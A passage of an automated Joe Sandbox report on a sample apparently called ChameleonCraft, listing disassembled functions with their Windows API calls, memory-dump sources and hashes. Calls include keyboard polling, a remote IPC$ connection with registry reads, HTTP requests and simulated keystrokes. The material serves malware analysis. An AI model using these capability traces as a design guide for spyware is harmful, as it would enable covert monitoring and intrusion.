                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C11F
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C130
                                                          • #418.OLEAUT32(?,00000000,00000000,00A33C7C,?,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C149
                                                          • GlobalFree.KERNEL32(00000000), ref: 00A2C159
                                                          • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C17D
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C1A8
                                                          • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C1D0
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C1E6
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 2779716855-0
                                                          • Opcode ID: da1ac8cbaf5e96ee789eeb1ec7b54f760a22cdedf642ece43b126df714b604a6
                                                          • Instruction ID: fe80b06c19a7c9b33acccc7ecbef632e83ad33f8a39fc26c37246fe592a0669b
                                                          • Opcode Fuzzy Hash: da1ac8cbaf5e96ee789eeb1ec7b54f760a22cdedf642ece43b126df714b604a6
                                                          • Instruction Fuzzy Hash: BF413A71500218EFCB11DFA4DC88EAF7BB8EB89721F104168F905E7260D7309941DB60
                                                          Function 00A0A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?,?,00A30990,?,009E30B6,00000085,?), ref: 00A0A4D4
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                          • LoadStringW.USER32(?,?,00000FFF,?,?,009E30B6,00000085,?), ref: 00A0A4F6
                                                          • __swprintf.LIBCMT ref: 00A0A54F
                                                          • __swprintf.LIBCMT ref: 00A0A568
                                                          • _wprintf.LIBCMT ref: 00A0A61E
                                                          • _wprintf.LIBCMT ref: 00A0A63C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-2391861430
                                                          • Opcode ID: 78116417095d3bac76cd403466654b30c008964f0ea776abdc5ccf684cdce8e1
                                                          • Instruction ID: b062da03e27d6bf39adedef7b42e88ab608c775be92a5b96c0ad113f6964f0d5
                                                          • Opcode Fuzzy Hash: 78116417095d3bac76cd403466654b30c008964f0ea776abdc5ccf684cdce8e1
                                                          • Instruction Fuzzy Hash: 7051AC71800219BBCF15EBE0EEA6FEEB778AF54350F504125F505A20A2EB312F58CB61
                                                          Function 009F83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009B1821: _memmove.LIBCMT ref: 009B185B
                                                          • _memset.LIBCMT ref: 009F8489
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 009F84BE
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009F84DA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009F84F6
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009F8520
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009F8548
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F8553
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F8558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: 0fababce70a72c3edce2fdcd203ce7c471c84aa22a9fa80da57dbd3b29b14f64
                                                          • Instruction ID: 078aa8089f96727fab306ed8d7c5a450f721859b6ede70bc24289b8af3c2f258
                                                          • Opcode Fuzzy Hash: 0fababce70a72c3edce2fdcd203ce7c471c84aa22a9fa80da57dbd3b29b14f64
                                                          • Instruction Fuzzy Hash: 4A412376C1022DABCF11EBA4ECA5EEEB778BF44760B404569F911A6161EA309E04CB90
                                                          Function 009A23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009A1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009A2412,?,00000000,?,?,?,?,009A1AA7,00000000,?), ref: 009A1F76
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009A24AF
                                                          • KillTimer.USER32(?,?,?,?,?,009A1AA7,00000000,?,?,009A1EBE,?,?), ref: 009A254A
                                                          • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,009A1AA7,00000000,?,?,009A1EBE,?,?), ref: 009DBFE7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009A1AA7,00000000,?,?,009A1EBE,?,?), ref: 009DC018
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009A1AA7,00000000,?,?,009A1EBE,?,?), ref: 009DC02F
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009A1AA7,00000000,?,?,009A1EBE,?,?), ref: 009DC04B
                                                          • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009DC05D
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: d00c68d812adfc8f0b223ab484d2fe742acd7beba2e4eba49777dfe7457d52b4
                                                          • Instruction ID: 693d28a066a0cfd98a5b2200e77aa88e27103a8b419e1db736a7dc83ffaf2592
                                                          • Opcode Fuzzy Hash: d00c68d812adfc8f0b223ab484d2fe742acd7beba2e4eba49777dfe7457d52b4
                                                          • Instruction Fuzzy Hash: AE615430524602DFDB25DF98C958B2ABBF5FB4631AF108929E04257A70C7B5AC92DFD0
                                                          Function 009A2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,009A1AE0,?,?,?,?,?,?,009A1D8F,?,?,?), ref: 009A29BC
                                                          • GetSysColor.USER32(0000000F,?,?,?,?), ref: 009A25AF
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: d600dcba737036c332641eeb837f32628dbc3dc4305608fa2fd762e397c8163f
                                                          • Instruction ID: 896361a33f6b3c02f7c8a2f192ceb398d7d0889aae1dbde56d900c0fa7d4a3c3
                                                          • Opcode Fuzzy Hash: d600dcba737036c332641eeb837f32628dbc3dc4305608fa2fd762e397c8163f
                                                          • Instruction Fuzzy Hash: 2541B231005144AFDB259F6C9C98BB93B69FB0A335F198266FE658A1E5C7308C42DBA1
                                                          Function 00A00508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00A00530
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00A005B1
                                                          • GetKeyState.USER32(000000A0), ref: 00A005CC
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00A005E6
                                                          • GetKeyState.USER32(000000A1), ref: 00A005FB
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00A00613
                                                          • GetKeyState.USER32(00000011), ref: 00A00625
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00A0063D
                                                          • GetKeyState.USER32(00000012), ref: 00A0064F
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00A00667
                                                          • GetKeyState.USER32(0000005B), ref: 00A00679
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 3288dadf4608e35d38719b76a031c9f8ab3627d3088bcc7772301ecb90b12c79
                                                          • Instruction ID: ff6105c741c9837ea978ad1f831cd55c6e165695d204221afe44fa4726f1a76d
                                                          • Opcode Fuzzy Hash: 3288dadf4608e35d38719b76a031c9f8ab3627d3088bcc7772301ecb90b12c79
                                                          • Instruction Fuzzy Hash: 6341D8309047CE6DFF308764AC14BB6BEA16B51304F08805AD5C6475C1EBE9A9D8CFA2
                                                          Function 00A0443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00A04451
                                                          • __swprintf.LIBCMT ref: 00A0445E
                                                            • Part of subcall function 009C38C8: __woutput_l.LIBCMT ref: 009C3921
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00A04488
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00A04494
                                                          • LockResource.KERNEL32(00000000), ref: 00A044A1
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00A044C1
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00A044D3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00A044E2
                                                          • LockResource.KERNEL32(?), ref: 00A044EE
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 00A0454F
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: a3b228a9fb58ba90c11d868e182869c66fbe5c0adedef891aaee6c9ff50e0d79
                                                          • Instruction ID: 9e72c40640ee20cdf30dcaf51b85f9f928e214577e7d8821d6ba0dd6456084f1
                                                          • Opcode Fuzzy Hash: a3b228a9fb58ba90c11d868e182869c66fbe5c0adedef891aaee6c9ff50e0d79
                                                          • Instruction Fuzzy Hash: 4E316EB190121AABDB11DFA0EC58EBB7BBCFB08301F048555FA16D6190D774EE11CBA0
                                                          Function 009DC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008,00000000), ref: 009A260D
                                                          • SetTextColor.GDI32(?,000000FF,00000000), ref: 009A2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 009A262C
                                                          • GetStockObject.GDI32(00000005), ref: 009A2634
                                                          • GetClientRect.USER32(?), ref: 009DC0FC
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 009DC113
                                                          • GetWindowDC.USER32(?), ref: 009DC11F
                                                          • GetPixel.GDI32(00000000,?,?), ref: 009DC12E
                                                          • ReleaseDC.USER32(?,00000000), ref: 009DC140
                                                          • GetSysColor.USER32(00000005), ref: 009DC15E
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: b048481f7126d1b5ea6ff646698aa82194f9e831ac67d8a726d97abe0ab1fed1
                                                          • Instruction ID: e1b44d26c8d461295d88a0f9cda9fa4171e887a702d47f2d322d2a0d59aa5531
                                                          • Opcode Fuzzy Hash: b048481f7126d1b5ea6ff646698aa82194f9e831ac67d8a726d97abe0ab1fed1
                                                          • Instruction Fuzzy Hash: F111A931500205BFDB219FE4EC18FE97BBAFB08321F108262FA26950E1CB710952EF50
                                                          Function 00A2C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,009A1CE4,?), ref: 009A29F3
                                                            • Part of subcall function 009A2714: GetCursorPos.USER32(?,?,00A677B0,?,00A677B0,00A677B0,?,00A2C5FF,00000000,00000001,?,?,?,009DBD40,?,?), ref: 009A2727
                                                            • Part of subcall function 009A2714: ScreenToClient.USER32(00A677B0,?,?,00A2C5FF,00000000,00000001,?,?,?,009DBD40,?,?,?,?,?,00000001), ref: 009A2744
                                                            • Part of subcall function 009A2714: GetAsyncKeyState.USER32(?,?,00A2C5FF,00000000,00000001,?,?,?,009DBD40,?,?,?,?,?,00000001,?), ref: 009A2769
                                                            • Part of subcall function 009A2714: GetAsyncKeyState.USER32(?,?,00A2C5FF,00000000,00000001,?,?,?,009DBD40,?,?,?,?,?,00000001,?), ref: 009A2777
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A2C69C
                                                          • ImageList_EndDrag.COMCTL32 ref: 00A2C6A2
                                                          • ReleaseCapture.USER32 ref: 00A2C6A8
                                                          • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 00A2C752
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A2C765
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A2C847
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 58d07b90e3d69a421505fb099ad3ee86330bb5a04da1ae9aa8c7cb9248ff5c53
                                                          • Instruction ID: 363c09a82e74aa52b8397177f190a8a5de735337a6c22299e7de1fc67a113447
                                                          • Opcode Fuzzy Hash: 58d07b90e3d69a421505fb099ad3ee86330bb5a04da1ae9aa8c7cb9248ff5c53
                                                          • Instruction Fuzzy Hash: 6F51AA70604304AFD704EF24DC5AFAE7BF1EB84324F108929F995872A1DB70A945CB92
                                                          Function 00A120E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00A1211C
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00A12148
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A1218A
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 00A1219F
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00A121AC
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00A121DC
                                                          • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 00A12223
                                                            • Part of subcall function 00A12B4F: GetLastError.KERNEL32(?,?,00A11EE3,00000000,00000000,00000001), ref: 00A12B64
                                                            • Part of subcall function 00A12B4F: SetEvent.KERNEL32(?,?,00A11EE3,00000000,00000000,00000001), ref: 00A12B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: f8b8b4b4101f95641aac0ed16b35563dee5f7fb7708f9c65e4c98057c379d06b
                                                          • Instruction ID: 5ddcb9bb3ef66a2800f6ca47a9b73c44714c7f45155d168f6146edd7bca1ad8c
                                                          • Opcode Fuzzy Hash: f8b8b4b4101f95641aac0ed16b35563dee5f7fb7708f9c65e4c98057c379d06b
                                                          • Instruction Fuzzy Hash: F1416AB1500608BFEB129F60CC89FFF7BACEB08350F00411AFA059A141E770DEA58BA0
                                                          Function 009FA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009FB52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,009FA23B,?,00000001), ref: 009FB54D
                                                            • Part of subcall function 009FB52D: GetCurrentThreadId.KERNEL32 ref: 009FB554
                                                            • Part of subcall function 009FB52D: AttachThreadInput.USER32(00000000,?,009FA23B,?,00000001), ref: 009FB55B
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 009FA246
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 009FA263
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009FA266
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000025,00000000,?,00000001), ref: 009FA26F
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000,?,00000001), ref: 009FA28D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009FA290
                                                          • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000027,00000000,?,00000001), ref: 009FA299
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 009FA2B0
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009FA2B3
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 2c6e0f8a9057aeb55379fb10b1dd86f6546f457073f2f549c522a69f7a09f318
                                                          • Instruction ID: 90dfd23cf948c17e994dad8c4cacc088e8a34d45fb00a3ccafe679e4124a5013
                                                          • Opcode Fuzzy Hash: 2c6e0f8a9057aeb55379fb10b1dd86f6546f457073f2f549c522a69f7a09f318
                                                          • Instruction Fuzzy Hash: 9911C2B1650618BEF610AFA09C4AF6A3E1DEB8C750F100415F3546B090CAF25C519AA0
                                                          Function 00A1A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
